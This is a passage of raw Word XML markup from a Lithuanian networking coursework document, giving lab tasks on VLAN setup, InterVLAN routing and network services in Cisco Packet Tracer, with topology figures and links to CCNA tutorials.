              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CE96137" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0592CDB1" w14:textId="4C50E4EC" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C"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1</w:t>
      </w:r>
      <w:r w:rsidR="00683BC8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>VLAN</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TINKLO SUDARYMAS IR KONFIGŪRAVIMAS</w:t>
      </w:r>
      <w:r w:rsidR="003B60A5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE9B852" w14:textId="48AEC742" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>UŽDUOTIES SĄLYGA:</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sujunkite, konfigūruokite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ateiktą tinklo topologiją naudodamiesi komandos eilute ir pateikite įrenginių sąrašą su tinklo nuostatomis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00510466" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Pastaba</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>: topologijai įgyvendinti naudokite programinę įrangą Cisco Packet Tracer arba turimo gamintojo fizinę įrangą, kurioje galimas VLAN konfigūravimas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F227208" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="288F63C1" wp14:editId="2759CDB2">
            <wp:extent cx="4311989" cy="3714208"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>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pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId176">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4311989" cy="3714208"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="277D607F" w14:textId="0DF065D0" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00A433BD" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pav. Tinklo topologija su VLAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEBA3DC" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C"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5DF9D97B" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5519241E" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408B63F9" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN Practice Lab Setup in Packet Tracer. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Computer networking notes.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId177">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.computernetworkingnotes.com/ccna-study-guide/vlan-practice-lab-setup-in-packet-tracer.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E870F77" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure VTP Server and Client in Switch. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Computer networking notes.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId178">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.computernetworkingnotes.com/ccna-study-guide/configure-vtp-server-and-client-in-switch.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E69110F" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>VLAN Configuration Commands Step by Step Explained.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Computer networking notes.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId179">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.computernetworkingnotes.com/ccna-study-guide/vlan-configuration-commands-step-by-step-explained.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7FC05B90" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1185B1D4" w14:textId="2277574C" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C"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1</w:t>
      </w:r>
      <w:r w:rsidR="00D44385" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>VLAN</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TINKLO SUDARYMAS IR KONFIGŪRAVIMAS. INTERVLAN ROUTING.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5103D813" w14:textId="0B062451" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>UŽDUOTIES SĄLYGA:</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sujunkite, konfigūruokite naudodami komandos eilute</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ateiktą tinklo topologiją ir pateikite įrenginių sąrašą su tinklo nuostatomis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B852460" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Pastaba</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>: topologijai įgyvendinti naudokite programinę įrangą Cisco Packet Tracer arba turimo gamintojo fizinę įrangą, kurioje galimas VLAN konfigūravimas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD137B0" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DC09464" wp14:editId="619D0A88">
            <wp:extent cx="4056045" cy="3277235"/>
            <wp:effectExtent l="0" t="0" r="1905"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pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId180">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4056045" cy="3277235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E523959" w14:textId="45BEB1EA" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00A433BD" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pav. Tinklo topologija su InterVLAN Routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736EE013" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C"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7F972372" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6437D801" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D66877D" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN Configuration Commands Step by Step Explained. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Computer networking notes.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId181">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.computernetworkingnotes.com/ccna-study-guide/vlan-configuration-commands-step-by-step-explained.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="71689A2D" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">InterVLAN Routing. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Networklessons.com</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId182">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://networklessons.com/switching/intervlan-routing</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54EFB365" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AC21E0F" w14:textId="1E6FF665" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="008E0CD5"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1</w:t>
      </w:r>
      <w:r w:rsidR="00D44385" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>VLAN</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TINKLO SUDARYMAS IR KONFIGŪRAVIMAS. TINKLO PASLAUGOS. BEVIELIS TINKLAS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5407DC4C" w14:textId="60DDF476" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>UŽDUOTIES SĄLYGA:</w:t>
      </w:r>
      <w:r w:rsidR="00640F71" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sujunkite, konfigūruokite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
